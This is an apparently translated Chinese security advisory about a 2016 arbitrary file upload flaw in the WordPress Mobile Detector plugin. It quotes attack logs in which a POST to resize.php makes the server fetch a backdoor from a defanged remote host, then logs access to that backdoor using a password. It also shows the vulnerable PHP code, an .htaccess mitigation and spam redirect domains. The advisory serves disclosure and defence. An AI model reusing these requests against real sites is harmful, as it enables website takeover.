新闻链接：632K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0G2j5X3q4G2i4K6u0W2x3K6j5H3i4K6u0W2j5$3&6Q4x3V1k6F1k6i4N6K6i4K6u0r3k6r3g2@1j5h3W2D9i4K6u0r3x3K6p5K6x3q4)9J5k6h3S2@1L8h3H3`.
   新闻时间：2016-06-06
   新闻正文：
986K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9&6i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6p5&6k6e0m8X3j5e0j5@1y4U0j5H3y4o6t1H3x3e0b7&6i4K6u0W2K9Y4m8Y4

*更新:WordPress Mobile Detector插件已经被修补,该漏洞已被解决。请尽快更新,打补丁的版本是3.6,最新的版本是3.7。

在过去的几天里,我们已经注意到问题网站的数量直线增长,而没有发现这些网站感染任何旧版插件或已知的漏洞。在大多数情况下,这可能是由于色情垃圾邮件导致的。我们的研究团队开始深入调查这个问题,我们发现,这些WordPress网站的共同点是使用了插件WP手机探测器,该插件于5月31日被报告发现了0 day任意文件上传漏洞。目前,该插件已经被从WordPress库中删除,且没有补丁可用。

该漏洞很容易被利用, 攻击者所要做的就是发送请求到 resize.php或timthumb.php到插件目录中(是的,timthumb,在这种情况下,它其中包含resize.php),而其中带有后门程序的URL。该漏洞被公开披露是在5月31日那天,但根据我们的防火墙日志,这次攻击自5月27日就已经实施了。好消息是,我们所有的客户已经获得了Sucuri防火墙虚拟硬化引擎的保护。

这就是我们在网络中发现的活跃有效载荷之一:

188.73.152.166 - - [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"

上面的例子是上传css.php到插件文件夹中的缓存目录中。上载完成后,攻击者试图获取后门的访问权限:

46.182.30.164 - - [02/Jun/2016:14:25:01 -0400] "POST /wp-content/plugins/wp-mobile-detector/cache/css.php HTTP/1.1"
Payload: pass=dinamit

使用后门密码“DINAMIT”。关于该漏洞,在这部分代码中不安全的功能在resize.php 中体现:

if (isset($_REQUEST['src'])) {
$path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
if(file_exists($path)){
...skipped…
}else{
file_put_contents($path, file_get_contents($_REQUEST['src']));
...skipped…
}
...skipped…

正如你所看到的,这是一个简单的漏洞,是通过失败的验证和不受信任源输入实现的。在这个过程中没有执行任何安全检查,且攻击者可以使用包含PHP代码的恶意URL来应对SRC变量。

不幸的是,这个帖子发布的那一刻,该插件已经从资源库中删除,且没有任何可以使用的插件更新。现在我们强烈建议大家删除这个插件。如果你真的需要这个插件,有一个临时的解决办法是在wp-mobile-detector/cache子目录禁用PHP执行,例如在.htaccess文件中使用此代码。

<Files *.php>
deny from all
</Files>

请注意,此修复程序只能防止从你的服务器上来的恶意软件被执行。黑客仍然能够通过第三方网站的链接上传,如内部框架,脚本,各种恶意下载渠道,或者是用来承载垃圾/非法内容来攻击文件缓存子目录 。你也可以完全禁用缓存子目录的写入权限,但这样可能会破坏一些插件功能。

我们一直在测试这款流行的WordPress安全插件其中可能的问题,通过提供应用级防火墙和其它的预防措施,该措施已经成功地规避了所有需要预防控制的潜在问题。设有Sucuri防火墙的网站已经通过系统虚拟硬化引擎进行了修补,这是发布的最后一道防线。

这时,大多数有漏洞的网站已经中了色情垃圾邮件的招。通常,您可以在站点根目录下找到gopni3g目录,其中包含story.php(门生成器脚本),.htaccess,和含有垃圾文件与模板的子目录。门会将访问者重定向到hxxp://bipaoeity[.]in/for/77?d=。

如果你已经受到影响且需要帮助,请告诉我们。

本文由 360安全播报 翻译，转载请注明“转自360安全播报”，并附上链接。
原文链接：a2fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2M7%4g2U0N6i4u0A6i4K6u0W2L8X3g2@1i4K6u0r3x3U0l9I4y4W2)9J5c8U0l9$3i4K6u0r3N6%4m8Q4x3X3c8E0L8$3u0A6L8r3g2Q4x3X3c8V1k6i4c8W2j5%4c8G2M7W2)9J5k6s2k6#2L8r3&6W2M7X3q4T1K9h3I4A6N6s2W2Q4x3X3c8T1k6h3W2F1k6#2)9J5k6r3g2^5M7r3I4G2K9i4c8W2k6q4)9J5k6r3W2F1i4K6u0V1N6r3S2W2i4K6u0V1N6$3W2D9k6q4)9J5k6h3S2@1L8h3H3`.

[培训]科锐逆向工程师培训第53期2025年7月8日开班！